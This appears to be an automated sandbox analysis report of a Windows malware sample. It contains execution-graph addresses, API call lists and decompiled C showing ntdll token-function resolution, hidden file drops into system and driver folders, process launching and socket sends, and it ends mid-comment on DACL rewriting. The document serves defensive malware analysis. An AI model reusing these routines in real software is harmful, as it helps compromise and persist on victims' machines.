                                                                                                                                  0x0040d96f
                                                                                                                                  0x0040d8da
                                                                                                                                  0x0040d8df
                                                                                                                                  0x0040d8e4
                                                                                                                                  0x0040d8e7
                                                                                                                                  0x0040d8ea
                                                                                                                                  0x0040d8ea
                                                                                                                                  0x0040d8ec
                                                                                                                                  0x0040d8ed
                                                                                                                                  0x0040d8ed
                                                                                                                                  0x0040d8f1
                                                                                                                                  0x0040d8f3
                                                                                                                                  0x0040d8f6
                                                                                                                                  0x0040d8f8
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d903
                                                                                                                                  0x0040d918
                                                                                                                                  0x0040d92a
                                                                                                                                  0x0040d92f
                                                                                                                                  0x0040d932
                                                                                                                                  0x0040d934
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d934
                                                                                                                                  0x0040d7a8
                                                                                                                                  0x0040d7aa
                                                                                                                                  0x0040d7b0
                                                                                                                                  0x0040d7be
                                                                                                                                  0x0040d7c3
                                                                                                                                  0x0040d7cf
                                                                                                                                  0x0040d7d6
                                                                                                                                  0x0040d7e1
                                                                                                                                  0x0040d7e2
                                                                                                                                  0x0040d7e2
                                                                                                                                  0x0040d7e5
                                                                                                                                  0x0040d7ed
                                                                                                                                  0x0040d020
                                                                                                                                  0x0040d025
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d033
                                                                                                                                  0x0040d039
                                                                                                                                  0x0040d03f
                                                                                                                                  0x0040d042
                                                                                                                                  0x0040d042
                                                                                                                                  0x0040d044
                                                                                                                                  0x0040d045
                                                                                                                                  0x0040d045
                                                                                                                                  0x0040d049
                                                                                                                                  0x0040d04b
                                                                                                                                  0x0040d04d
                                                                                                                                  0x0040d04f
                                                                                                                                  0x0040d057
                                                                                                                                  0x0040d059
                                                                                                                                  0x0040d059
                                                                                                                                  0x0040d057
                                                                                                                                  0x0040d06d
                                                                                                                                  0x0040d073
                                                                                                                                  0x0040d07a
                                                                                                                                  0x0040d07a
                                                                                                                                  0x0040d07d
                                                                                                                                  0x0040d07d
                                                                                                                                  0x0040d07f
                                                                                                                                  0x0040d080
                                                                                                                                  0x0040d080
                                                                                                                                  0x0040d084
                                                                                                                                  0x0040d084
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d084
                                                                                                                                  0x0040cfef
                                                                                                                                  0x0040cff5
                                                                                                                                  0x0040cffb
                                                                                                                                  0x0040cffe
                                                                                                                                  0x0040cffe
                                                                                                                                  0x0040d000
                                                                                                                                  0x0040d001
                                                                                                                                  0x0040d001
                                                                                                                                  0x0040d005
                                                                                                                                  0x0040d005
                                                                                                                                  0x00000000
                                                                                                                                  0x0040cf85
                                                                                                                                  0x0040cfb1
                                                                                                                                  0x0040cfbe
                                                                                                                                  0x0040cfc3
                                                                                                                                  0x0040cfc9
                                                                                                                                  0x0040cfcc
                                                                                                                                  0x0040cfcf
                                                                                                                                  0x0040cfcf
                                                                                                                                  0x0040cfd1
                                                                                                                                  0x0040cfd2
                                                                                                                                  0x0040cfd2
                                                                                                                                  0x0040cfd8
                                                                                                                                  0x0040d007
                                                                                                                                  0x0040d007
                                                                                                                                  0x0040d009
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d00b
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d00b
                                                                                                                                  0x0040cf2d
                                                                                                                                  0x0040cf2d
                                                                                                                                  0x0040cf30
                                                                                                                                  0x0040cf32
                                                                                                                                  0x0040cf32
                                                                                                                                  0x0040cf58
                                                                                                                                  0x0040cf58
                                                                                                                                  0x0040cf58
                                                                                                                                  0x0040cf5a
                                                                                                                                  0x0040cf5b
                                                                                                                                  0x0040cf5b
                                                                                                                                  0x0040cf61
                                                                                                                                  0x0040cf63
                                                                                                                                  0x0040cf65
                                                                                                                                  0x0040d086
                                                                                                                                  0x0040d086
                                                                                                                                  0x0040d089
                                                                                                                                  0x0040d0fe
                                                                                                                                  0x0040d104
                                                                                                                                  0x0040d104
                                                                                                                                  0x0040d105
                                                                                                                                  0x0040d10c
                                                                                                                                  0x0040d112
                                                                                                                                  0x0040d112
                                                                                                                                  0x0040d115
                                                                                                                                  0x0040d124
                                                                                                                                  0x0040d129
                                                                                                                                  0x0040d129
                                                                                                                                  0x0040d12c
                                                                                                                                  0x0040d130
                                                                                                                                  0x0040d13e
                                                                                                                                  0x0040d144
                                                                                                                                  0x0040d145
                                                                                                                                  0x0040d147
                                                                                                                                  0x0040d155
                                                                                                                                  0x0040d155
                                                                                                                                  0x0040d147
                                                                                                                                  0x0040d177
                                                                                                                                  0x0040d179
                                                                                                                                  0x0040d17c
                                                                                                                                  0x0040d33e
                                                                                                                                  0x0040d372
                                                                                                                                  0x0040d37f
                                                                                                                                  0x0040d384
                                                                                                                                  0x0040d38a
                                                                                                                                  0x0040d38d
                                                                                                                                  0x0040d390
                                                                                                                                  0x0040d390
                                                                                                                                  0x0040d392
                                                                                                                                  0x0040d393
                                                                                                                                  0x0040d393
                                                                                                                                  0x0040d397
                                                                                                                                  0x0040d399
                                                                                                                                  0x0040d39b
                                                                                                                                  0x0040d39d
                                                                                                                                  0x0040d3a5
                                                                                                                                  0x0040d3a7
                                                                                                                                  0x0040d3a7
                                                                                                                                  0x0040d3a5
                                                                                                                                  0x0040d3bd
                                                                                                                                  0x0040d3c3
                                                                                                                                  0x0040d3c7
                                                                                                                                  0x0040d3d5
                                                                                                                                  0x0040d3db
                                                                                                                                  0x0040d3dc
                                                                                                                                  0x0040d3de
                                                                                                                                  0x0040d3ec
                                                                                                                                  0x0040d3ec
                                                                                                                                  0x0040d3de
                                                                                                                                  0x0040d40e
                                                                                                                                  0x0040d410
                                                                                                                                  0x0040d413
                                                                                                                                  0x0040d428
                                                                                                                                  0x0040d42f
                                                                                                                                  0x0040d435
                                                                                                                                  0x0040d439
                                                                                                                                  0x0040d447
                                                                                                                                  0x0040d44d
                                                                                                                                  0x0040d44e
                                                                                                                                  0x0040d450
                                                                                                                                  0x0040d45b
                                                                                                                                  0x0040d45b
                                                                                                                                  0x0040d450
                                                                                                                                  0x0040d461
                                                                                                                                  0x0040d461
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d182
                                                                                                                                  0x0040d195
                                                                                                                                  0x0040d19c
                                                                                                                                  0x0040d1a2
                                                                                                                                  0x0040d1a6
                                                                                                                                  0x0040d1b4
                                                                                                                                  0x0040d1bb
                                                                                                                                  0x0040d1bd
                                                                                                                                  0x0040d1c8
                                                                                                                                  0x0040d1c8
                                                                                                                                  0x0040d1bd
                                                                                                                                  0x0040d1da
                                                                                                                                  0x0040d1e1
                                                                                                                                  0x0040d1e7
                                                                                                                                  0x0040d1e8
                                                                                                                                  0x0040d1ea
                                                                                                                                  0x0040d468
                                                                                                                                  0x0040d468
                                                                                                                                  0x0040d46b
                                                                                                                                  0x0040d47a
                                                                                                                                  0x0040d47f
                                                                                                                                  0x0040d47f
                                                                                                                                  0x0040d482
                                                                                                                                  0x0040d485
                                                                                                                                  0x0040d48b
                                                                                                                                  0x0040d48e
                                                                                                                                  0x0040d496
                                                                                                                                  0x0040d49b
                                                                                                                                  0x0040d4a2
                                                                                                                                  0x0040d4ac
                                                                                                                                  0x0040d4b1
                                                                                                                                  0x0040d4d8
                                                                                                                                  0x0040d4de
                                                                                                                                  0x0040d4e4
                                                                                                                                  0x0040d4e6
                                                                                                                                  0x0040d500
                                                                                                                                  0x0040d506
                                                                                                                                  0x0040d513
                                                                                                                                  0x0040d4e8
                                                                                                                                  0x0040d4f4
                                                                                                                                  0x0040d4fc
                                                                                                                                  0x0040d4fc
                                                                                                                                  0x0040d4e6
                                                                                                                                  0x0040d48e
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d1f0
                                                                                                                                  0x0040d1fd
[Execution graph residue: node labels spilled from the rendered graph image. The surviving labels are basic-block addresses in the range 0x0040cbe8 to 0x0040d583 of the sample's code section, interspersed with 0x00000000 placeholder nodes; no edges, API names or other node information survived extraction.]
                                                                                                                                  0x0040cc16
                                                                                                                                  0x0040dad2
                                                                                                                                  0x0040dad5
                                                                                                                                  0x0040dadb
                                                                                                                                  0x00000000
                                                                                                                                  0x0040cb60
                                                                                                                                  0x0040cb63
                                                                                                                                  0x00000000
                                                                                                                                  0x0040cb63
                                                                                                                                  0x0040cb5e
                                                                                                                                  0x0040ca4b
                                                                                                                                  0x0040ca4e
                                                                                                                                  0x0040ca4e
                                                                                                                                  0x00000000
                                                                                                                                  0x0040c9d2
                                                                                                                                  0x0040c9d2
                                                                                                                                  0x0040c9d8
                                                                                                                                  0x0040c9e0
                                                                                                                                  0x0040c9e1
                                                                                                                                  0x0040c9e3
                                                                                                                                  0x0040c9e9
                                                                                                                                  0x0040c9f1
                                                                                                                                  0x0040c9fb
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040c9fb
                                                                                                                                  0x00000000
                                                                                                                                  0x0040c9d8
                                                                                                                                  0x0040c9d0
                                                                                                                                  0x0040c9a5
                                                                                                                                  0x0040c9ab
                                                                                                                                  0x0040c9b2
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040c9b2

APIs
• closesocket.WS2_32(?), ref: 0040CA4E
• closesocket.WS2_32(?), ref: 0040CB63
• GetTempPathA.KERNEL32(00000120,?), ref: 0040CC28
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040CCB4
• WriteFile.KERNEL32(0040A4B3,?,-000000E8,?,00000000), ref: 0040CCDC
• CloseHandle.KERNEL32(0040A4B3), ref: 0040CCED
• wsprintfA.USER32 ref: 0040CD21
• CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040CD77
• WaitForSingleObject.KERNEL32(?,0000EA60), ref: 0040CD89
• CloseHandle.KERNEL32(?), ref: 0040CD98
• CloseHandle.KERNEL32(?), ref: 0040CD9D
• DeleteFileA.KERNEL32(?), ref: 0040CDC4
• CloseHandle.KERNEL32(0040A4B3), ref: 0040CDCC
• GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 0040CFB1
• GetSystemDirectoryA.KERNEL32 ref: 0040CFEF
• GetSystemDirectoryA.KERNEL32 ref: 0040D033
• lstrcatA.KERNEL32(?,?), ref: 0040D10C
• SetFileAttributesA.KERNEL32(?,00000080), ref: 0040D155
• CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0040D171
• WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040D195
• CloseHandle.KERNEL32(00000000), ref: 0040D19C
• SetFileAttributesA.KERNEL32(?,00000002), ref: 0040D1C8
• GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 0040D231
• lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,00000100), ref: 0040D27C
• SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,00000100), ref: 0040D2AB
• CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,00000100), ref: 0040D2C7
• WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000100), ref: 0040D2EB
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000100), ref: 0040D2F2
• SetFileAttributesA.KERNEL32(?,00000002,?,?,?,?,?,?,?,00000100), ref: 0040D326
• GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 0040D372
• lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,00000100), ref: 0040D3BD
• SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,00000100), ref: 0040D3EC
• CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,00000100), ref: 0040D408
• WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000100), ref: 0040D428
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000100), ref: 0040D42F
• SetFileAttributesA.KERNEL32(?,00000002,?,?,?,?,?,?,?,00000100), ref: 0040D45B
• CreateProcessA.KERNEL32(?,00410264,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040D4DE
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 0040D4F4
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 0040D4FC
• DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 0040D513
• closesocket.WS2_32(?), ref: 0040D56C
• Sleep.KERNEL32(000003E8), ref: 0040D577
• ExitProcess.KERNEL32 ref: 0040D583
• wsprintfA.USER32 ref: 0040D81F
  • Part of subcall function 0040C65C: send.WS2_32(00000000,?,00000000), ref: 0040C74B
• closesocket.WS2_32(?), ref: 0040DAD5
Strings
Memory Dump Source
• Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: File$CloseHandle$AttributesCreate$Writeclosesocket$EnvironmentProcessVariablelstrcat$DeleteDirectorySystemwsprintf$ExitObjectPathSingleSleepTempWaitsend
• String ID: .dat$.sys$4$@$PromptOnSecureDesktop$\$\$drivers\$except_info$flags_upd$lid_file_upd$local_time$localcfg$srv_time$time_cfg$work_srv$wtm_c$wtm_r$wtm_w
• API String ID: 562065436-3791576231
• Opcode ID: 431c57ecca7ae4cb2b117a44d91882894f065229d5c148e45f2a972d11218836
• Instruction ID: 1bec03d5b3261cfbda03ea9d0ba23ae7472bbf6119f1c93de8fbd0284471d070
• Opcode Fuzzy Hash: 431c57ecca7ae4cb2b117a44d91882894f065229d5c148e45f2a972d11218836
• Instruction Fuzzy Hash: 1BB2B471D00209BBEB209FA4DD85FEA7BB9EB08304F14457BF505B22D1D7789A898B5C
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00401000() {
	struct HINSTANCE__* _t2;
	_Unknown_base(*)()* _t3;
	signed int _t4;
	_Unknown_base(*)()* _t6;
	_Unknown_base(*)()* _t7;
	_Unknown_base(*)()* _t8;
	_Unknown_base(*)()* _t10;
	_Unknown_base(*)()* _t11;
	_Unknown_base(*)()* _t12;
	_Unknown_base(*)()* _t14;
	_Unknown_base(*)()* _t15;
	_Unknown_base(*)()* _t16;
	_Unknown_base(*)()* _t18;
	_Unknown_base(*)()* _t19;
	_Unknown_base(*)()* _t20;
	_Unknown_base(*)()* _t22;
	_Unknown_base(*)()* _t23;
	signed int _t34;
	signed int _t35;

	_t2 =  *0x413918;
	_t35 = _t34 | 0xffffffff;
	if(_t2 != 0) {
		L3:
		if( *0x41391c == 0 ||  *0x413920 == 0 ||  *0x413924 == 0 ||  *0x413928 == 0 ||  *0x41392c == 0 ||  *0x413930 == 0 ||  *0x413934 == 0 ||  *0x413938 == 0 ||  *0x41393c == 0 ||  *0x413940 == 0 ||  *0x413944 == 0 ||  *0x413948 == 0 ||  *0x41394c == 0 ||  *0x413950 == 0 ||  *0x413954 == 0) {
			_t3 = GetProcAddress(_t2, "RtlExpandEnvironmentStrings_U");
			 *0x41391c = _t3;
			if(_t3 == 0) {
				L34:
				_t4 = _t35;
			} else {
				_t35 = 0xfffffffe;
				_t6 = GetProcAddress( *0x413918, "RtlSetLastWin32Error");
				 *0x413920 = _t6;
				if(_t6 == 0) {
					goto L34;
				} else {
					_t35 = 0xfffffffd;
					_t7 = GetProcAddress( *0x413918, "NtTerminateProcess");
					 *0x413924 = _t7;
					if(_t7 == 0) {
						goto L34;
					} else {
						_t35 = 0xfffffffc;
						_t8 = GetProcAddress( *0x413918, "RtlFreeSid");
						 *0x413928 = _t8;
						if(_t8 == 0) {
							goto L34;
						} else {
							_t35 = 0xfffffffb;
							_t10 = GetProcAddress( *0x413918, "RtlInitUnicodeString");
							 *0x41392c = _t10;
							if(_t10 == 0) {
								goto L34;
							} else {
								_t35 = 0xfffffffa;
								_t11 = GetProcAddress( *0x413918, "NtSetInformationThread");
								 *0x413930 = _t11;
								if(_t11 == 0) {
									goto L34;
								} else {
									_t35 = 0xfffffff9;
									_t12 = GetProcAddress( *0x413918, "NtSetInformationToken");
									 *0x413934 = _t12;
									if(_t12 == 0) {
										goto L34;
									} else {
										_t35 = 0xfffffff8;
										_t14 = GetProcAddress( *0x413918, "RtlNtStatusToDosError");
										 *0x413938 = _t14;
										if(_t14 == 0) {
											goto L34;
										} else {
											_t35 = 0xfffffff7;
											_t15 = GetProcAddress( *0x413918, "NtClose");
											 *0x41393c = _t15;
											if(_t15 == 0) {
												goto L34;
											} else {
												_t35 = 0xfffffff6;
												_t16 = GetProcAddress( *0x413918, "NtOpenProcessToken");
												 *0x413940 = _t16;
												if(_t16 == 0) {
													goto L34;
												} else {
													_t35 = 0xfffffff5;
													_t18 = GetProcAddress( *0x413918, "NtDuplicateToken");
                                                                                                                                  																 *0x413944 = _t18;
                                                                                                                                  																if(_t18 == 0) {
                                                                                                                                  																	goto L34;
                                                                                                                                  																} else {
                                                                                                                                  																	_t35 = 0xfffffff4;
                                                                                                                                  																	_t19 = GetProcAddress( *0x413918, "RtlAllocateAndInitializeSid");
                                                                                                                                  																	 *0x413948 = _t19;
                                                                                                                                  																	if(_t19 == 0) {
                                                                                                                                  																		goto L34;
                                                                                                                                  																	} else {
                                                                                                                                  																		_t35 = 0xfffffff3;
                                                                                                                                  																		_t20 = GetProcAddress( *0x413918, "NtFilterToken");
                                                                                                                                  																		 *0x41394c = _t20;
                                                                                                                                  																		if(_t20 == 0) {
                                                                                                                                  																			goto L34;
                                                                                                                                  																		} else {
                                                                                                                                  																			_t35 = 0xfffffff2;
                                                                                                                                  																			_t22 = GetProcAddress( *0x413918, "RtlLengthSid");
                                                                                                                                  																			 *0x413950 = _t22;
                                                                                                                                  																			if(_t22 == 0) {
                                                                                                                                  																				goto L34;
                                                                                                                                  																			} else {
                                                                                                                                  																				_t35 = 0xfffffff1;
                                                                                                                                  																				_t23 = GetProcAddress( *0x413918, "NtQueryInformationToken");
                                                                                                                                  																				 *0x413954 = _t23;
                                                                                                                                  																				_t1 = _t35 + 0x10; // 0x100000001
                                                                                                                                  																				_t4 = _t1;
                                                                                                                                  																				if(_t23 == 0) {
                                                                                                                                  																					goto L34;
                                                                                                                                  																				}
                                                                                                                                  																			}
                                                                                                                                  																		}
                                                                                                                                  																	}
                                                                                                                                  																}
                                                                                                                                  															}
                                                                                                                                  														}
                                                                                                                                  													}
                                                                                                                                  												}
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						return _t4;
                                                                                                                                  					} else {
                                                                                                                                  						return 1;
                                                                                                                                  					}
                                                                                                                                  				} else {
                                                                                                                                  					_t2 = LoadLibraryA("ntdll.dll");
                                                                                                                                  					 *0x413918 = _t2;
                                                                                                                                  					if(_t2 != 0) {
                                                                                                                                  						goto L3;
                                                                                                                                  					} else {
                                                                                                                                  						return _t2;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(ntdll.dll,00000000,00401839,00409646), ref: 00401012
                                                                                                                                  • GetProcAddress.KERNEL32(?,RtlExpandEnvironmentStrings_U), ref: 004010C2
                                                                                                                                  • GetProcAddress.KERNEL32(?,RtlSetLastWin32Error), ref: 004010E1
                                                                                                                                  • GetProcAddress.KERNEL32(?,NtTerminateProcess), ref: 00401101
                                                                                                                                  • GetProcAddress.KERNEL32(?,RtlFreeSid), ref: 00401121
                                                                                                                                  • GetProcAddress.KERNEL32(?,RtlInitUnicodeString), ref: 00401140
                                                                                                                                  • GetProcAddress.KERNEL32(?,NtSetInformationThread), ref: 00401160
                                                                                                                                  • GetProcAddress.KERNEL32(?,NtSetInformationToken), ref: 00401180
                                                                                                                                  • GetProcAddress.KERNEL32(?,RtlNtStatusToDosError), ref: 0040119F
                                                                                                                                  • GetProcAddress.KERNEL32(?,NtClose), ref: 004011BF
                                                                                                                                  • GetProcAddress.KERNEL32(?,NtOpenProcessToken), ref: 004011DF
                                                                                                                                  • GetProcAddress.KERNEL32(?,NtDuplicateToken), ref: 004011FE
                                                                                                                                  • GetProcAddress.KERNEL32(?,RtlAllocateAndInitializeSid), ref: 0040121A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                  • String ID: NtClose$NtDuplicateToken$NtFilterToken$NtOpenProcessToken$NtQueryInformationToken$NtSetInformationThread$NtSetInformationToken$NtTerminateProcess$RtlAllocateAndInitializeSid$RtlExpandEnvironmentStrings_U$RtlFreeSid$RtlInitUnicodeString$RtlLengthSid$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                                                                                                  • API String ID: 2238633743-3228201535
                                                                                                                                  • Opcode ID: 099c329b46637f9171a1ca57a4c5e0107e32006a0b8f6d8903d04b45664d461e
                                                                                                                                  • Instruction ID: c8dd2db2df3f08e17c6117e54d1286841a2c4197db930f8a9693796d5e259140
                                                                                                                                  • Opcode Fuzzy Hash: 099c329b46637f9171a1ca57a4c5e0107e32006a0b8f6d8903d04b45664d461e
                                                                                                                                  • Instruction Fuzzy Hash: 2F5100B1662641A6D7118F69EC84BD23AE86748372F14837B9520F62F0D7F8CAC1CB5D
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                  			E0040B211(FILETIME* _a4, CHAR* _a8, signed int _a12) {
                                                                                                                                  				struct _FILETIME _v12;
                                                                                                                                  				struct _SYSTEMTIME _v28;
                                                                                                                                  				CHAR* _v32;
                                                                                                                                  				CHAR* _v36;
                                                                                                                                  				CHAR* _v40;
                                                                                                                                  				CHAR* _v44;
                                                                                                                                  				CHAR* _v48;
                                                                                                                                  				CHAR* _v52;
                                                                                                                                  				CHAR* _v56;
                                                                                                                                  				CHAR* _v60;
                                                                                                                                  				CHAR* _v64;
                                                                                                                                  				CHAR* _v68;
                                                                                                                                  				CHAR* _v72;
                                                                                                                                  				CHAR* _v76;
                                                                                                                                  				CHAR* _v80;
                                                                                                                                  				CHAR* _v84;
                                                                                                                                  				CHAR* _v88;
                                                                                                                                  				CHAR* _v92;
                                                                                                                                  				CHAR* _v96;
                                                                                                                                  				CHAR* _v100;
                                                                                                                                  				CHAR* _v104;
                                                                                                                                  				struct _TIME_ZONE_INFORMATION _v276;
                                                                                                                                  				long _t77;
                                                                                                                                  				signed int _t80;
                                                                                                                                  				signed int _t93;
                                                                                                                                  				signed int _t101;
                                                                                                                                  				signed int _t102;
                                                                                                                                  				CHAR* _t103;
                                                                                                                                  				signed int _t104;
                                                                                                                                  				signed short _t106;
                                                                                                                                  				signed short _t109;
                                                                                                                                  				signed int _t114;
                                                                                                                                  				signed int _t115;
                                                                                                                                  				void* _t117;
                                                                                                                                  
                                                                                                                                  				_v56 = "Sun";
                                                                                                                                  				_v52 = "Mon";
                                                                                                                                  				_v48 = "Tue";
                                                                                                                                  				_v44 = "Wed";
                                                                                                                                  				_v40 = "Thu";
                                                                                                                                  				_v36 = "Fri";
                                                                                                                                  				_v32 = "Sat";
                                                                                                                                  				_v104 = "Jan";
                                                                                                                                  				_v100 = "Feb";
                                                                                                                                  				_v96 = "Mar";
                                                                                                                                  				_v92 = "Apr";
                                                                                                                                  				_v88 = "May";
                                                                                                                                  				_v84 = "Jun";
                                                                                                                                  				_v80 = "Jul";
                                                                                                                                  				_v76 = "Aug";
                                                                                                                                  				_v72 = "Sep";
                                                                                                                                  				_v68 = "Oct";
                                                                                                                                  				_v64 = "Nov";
                                                                                                                                  				_v60 = "Dec";
                                                                                                                                  				if(_a4 != 0) {
                                                                                                                                  					FileTimeToLocalFileTime(_a4,  &_v12);
                                                                                                                                  					FileTimeToSystemTime( &_v12,  &_v28);
                                                                                                                                  				} else {
                                                                                                                                  					GetLocalTime( &_v28);
                                                                                                                                  				}
                                                                                                                                  				_t114 = _a12;
                                                                                                                                  				if(_t114 != 0) {
                                                                                                                                  					SystemTimeToFileTime( &_v28,  &_v12);
                                                                                                                                  					_t93 = E0040ECA5();
                                                                                                                                  					if(_t114 <= 0) {
                                                                                                                                  						_t104 = _t93 %  ~_t114 * 0x23c34600;
                                                                                                                                  						_v12.dwLowDateTime = _v12.dwLowDateTime - _t104;
                                                                                                                                  						asm("sbb [ebp-0x4], ebx");
                                                                                                                                  					} else {
                                                                                                                                  						_t104 = _t93 % _t114 * 0x23c34600;
                                                                                                                                  						_v12.dwLowDateTime = _v12.dwLowDateTime + _t104;
                                                                                                                                  						asm("adc [ebp-0x4], ebx");
                                                                                                                                  					}
                                                                                                                                  					FileTimeToSystemTime( &_v12,  &_v28);
                                                                                                                                  				}
                                                                                                                                  				_v276.Bias = 0;
                                                                                                                                  				_t77 = GetTimeZoneInformation( &_v276);
                                                                                                                                  				_t101 = _v276.Bias;
                                                                                                                                  				if(_t77 == 2) {
                                                                                                                                  					_t101 = _t101 + _v276.DaylightBias;
                                                                                                                                  				}
                                                                                                                                  				_t102 =  ~_t101;
                                                                                                                                  				asm("cdq");
                                                                                                                                  				_t80 = (_t102 ^ _t104) - _t104;
                                                                                                                                  				if(_v28.wDayOfWeek > 6) {
                                                                                                                                  					_t109 = 6;
                                                                                                                                  					_v28.wDayOfWeek = _t109;
                                                                                                                                  				}
                                                                                                                                  				if(_v28.wMonth == 0) {
                                                                                                                                  					_v28.wMonth = 1;
                                                                                                                                  				}
                                                                                                                                  				if(_v28.wMonth > 0xc) {
                                                                                                                                  					_t106 = 0xc;
                                                                                                                                  					_v28.wMonth = _t106;
                                                                                                                                  				}
                                                                                                                                  				_t103 = "+";
                                                                                                                                  				if(_t102 < 0) {
                                                                                                                                  					_t103 = "-";
                                                                                                                                  				}
                                                                                                                                  				_t115 = 0x3c;
                                                                                                                                  				asm("cdq");
                                                                                                                                  				return wsprintfA(_a8, "%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u",  *((intOrPtr*)(_t117 + (_v28.wDayOfWeek & 0x0000ffff) * 4 - 0x34)), _v28.wDay & 0x0000ffff,  *((intOrPtr*)(_t117 + (_v28.wMonth & 0x0000ffff) * 4 - 0x68)), _v28.wYear & 0x0000ffff, _v28.wHour & 0x0000ffff, _v28.wMinute & 0x0000ffff, _v28.wSecond & 0x0000ffff, _t103, _t80 / _t115, _t80 % _t115);
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                  • GetLocalTime.KERNEL32(0003E800,?,0003E800,00000000), ref: 0040B2B3
                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(00000000,00000000,?,0003E800,00000000), ref: 0040B2C2
                                                                                                                                  • FileTimeToSystemTime.KERNEL32(00000000,0003E800), ref: 0040B2D0
                                                                                                                                  • SystemTimeToFileTime.KERNEL32(0003E800,00000000), ref: 0040B2E1
                                                                                                                                  • FileTimeToSystemTime.KERNEL32(00000000,0003E800), ref: 0040B31A
                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?), ref: 0040B329
                                                                                                                                  • wsprintfA.USER32 ref: 0040B3B7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$File$System$Local$InformationZonewsprintf
                                                                                                                                  • String ID: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u$Apr$Aug$Dec$Feb$Fri$Jan$Jul$Jun$Mar$May$Mon$Nov$Oct$Sat$Sep$Sun$Thu$Tue$Wed
                                                                                                                                  • API String ID: 766114626-2976066047
                                                                                                                                  • Opcode ID: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                                                                  • Instruction ID: 3cccae2c5b68faf9d5e65ebc3321ef0303f497beb4f825406ae493c25d793f5b
                                                                                                                                  • Opcode Fuzzy Hash: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                                                                  • Instruction Fuzzy Hash: D8510EB1D0021CAADF18DFD5D8495EEBBB9EF48304F10856BE501B6250E7B84AC9CF98
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

C-Code - Quality: 98%
/* Decompiled from the memory dump above. Reads the DACL of the file _a4,
   drops ACEs whose SID was already seen earlier in the list, rewrites the
   access mask of each remaining ACE (0x1200a8 for other SIDs; for the
